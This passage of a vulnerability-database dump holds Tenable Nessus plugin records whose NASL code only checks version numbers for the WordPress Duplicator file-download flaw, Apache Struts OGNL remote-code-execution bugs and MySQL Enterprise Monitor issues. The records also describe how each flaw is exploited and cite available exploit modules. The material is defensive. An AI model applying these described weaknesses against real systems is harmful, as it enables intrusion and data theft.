script_id(133846);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-11738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable\nto unauthenticated arbitrary file download.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.\");\n # https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f2901d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'Duplicator' plugin to version 1.3.28 or greater\nthrough the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11738\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"WordPress Duplicator < 1.3.28 Directory Traversal\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'duplicator');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version': '1.0.0', 'max_version': '1.3.26', 'fixed_version' : '1.3.28' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-16T15:01:13", "description": "The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a a remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user input. An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.26 RCE (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-06-16T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_26.NASL", "href": "https://www.tenable.com/plugins/nessus/143599", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143599);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/16\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.x < 2.5.26 RCE (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a \na remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user \ninput. An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workarounds as referenced in the vendor \n security bulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nos = get_kb_item_or_exit('Host/OS');\nwin_local = 'windows' >< tolower(os);\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{'min_version':'2.0.0', 'fixed_version':'2.5.26'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-13T16:02:28", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a vulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. (CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-08-09T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-061.NASL", "href": "https://www.tenable.com/plugins/nessus/151425", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151425);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/09\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.26. It is, therefore, affected by a\nvulnerability as referenced in the S2-061 advisory.\n\n - Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code\n execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. (CVE-2020-17530)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.25', 'fixed_version' : '2.5.26' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:29:36", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {}, "published": "2022-05-18T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.29 Remote Code Execution (S2-062)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113226", "href": "https://www.tenable.com/plugins/was/113226", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:57", "description": "The version of Apache Struts installed on the remote host is prior to 2.5.30. It is, therefore, affected by a vulnerability as referenced in the S2-062 advisory.\n\n - The fix issued for CVE-2020-17530 ( S2-061 ) was incomplete. Still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation. (CVE-2021-31805)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_S2-062.NASL", "href": "https://www.tenable.com/plugins/nessus/159667", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159667);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/12\");\n\n script_cve_id(\"CVE-2021-31805\");\n\n script_name(english:\"Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by Possible Remote Code Execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is prior to 2.5.30. It is, therefore, affected by a\nvulnerability as referenced in the S2-062 advisory.\n\n - The fix issued for CVE-2020-17530 ( S2-061 ) was incomplete. Still some of the tag's attributes could\n perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security\n degradation. (CVE-2021-31805)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-062\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.30 or later. Alternatively, apply the workaround as referenced in in the vendor's\nsecurity bulletin\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar os = get_kb_item_or_exit('Host/OS');\nvar win_local = ('windows' >< tolower(os));\n\nvar app_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.29', 'fixed_version' : '2.5.30' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:08:15", "description": "MySQL Enterprise Monitor installed on the remote host is 8.0.x prior to 8.0.24. Therefore, it's affected by multiple vulnerabilities as referenced in the April 2021 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Tomcat)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Enterprise Monitor accessible data (CVE-2020-17527).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (Apache Struts)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor (CVE-2020-17530).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (OpenSSL)).\n Supported versions that are affected are 8.0.23 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Enterprise Monitor accessible data as well as unauthorized access to critical data or complete access to all MySQL Enterprise Monitor accessible data (CVE-2021-3450).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-26T00:00:00", "type": "nessus", "title": "Oracle MySQL Enterprise Monitor Multiple Vulnerabilities (Apr 2021 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17527", "CVE-2020-17530", "CVE-2021-23841", "CVE-2021-25122", "CVE-2021-3450"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_24.NASL", "href": "https://www.tenable.com/plugins/nessus/148986", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148986);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-17527\",\n \"CVE-2020-17530\",\n \"CVE-2021-3450\",\n \"CVE-2021-23841\",\n \"CVE-2021-25122\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle MySQL Enterprise Monitor Multiple Vulnerabilities (Apr 2021 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"MySQL Enterprise Monitor installed on the remote host is 8.0.x prior to 8.0.24. Therefore, it's affected by \nmultiple vulnerabilities as referenced in the April 2021 CPU advisory.\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General \n (Apache Tomcat)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Enterprise Monitor.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to\n all MySQL Enterprise Monitor accessible data (CVE-2020-17527).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General \n (Apache Struts)). Supported versions that are affected are 8.0.23 and prior. Easily exploitable vulnerability \n allows unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful\n attacks of this vulnerability can result in takeover of MySQL Enterprise Monitor (CVE-2020-17530).\n\n - Vulnerability in the MySQL Enterprise Monitor product of Oracle MySQL (component: Monitoring: General (OpenSSL)).\n Supported versions that are affected are 8.0.23 and prior. Difficult to exploit vulnerability allows \n unauthenticated attacker with network access via HTTPS to compromise MySQL Enterprise Monitor. Successful attacks\n of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or \n all MySQL Enterprise Monitor accessible data as well as unauthorized access to critical data or complete access \n to all MySQL Enterprise Monitor accessible data (CVE-2021-3450).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuapr2021cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2021cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2021 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n 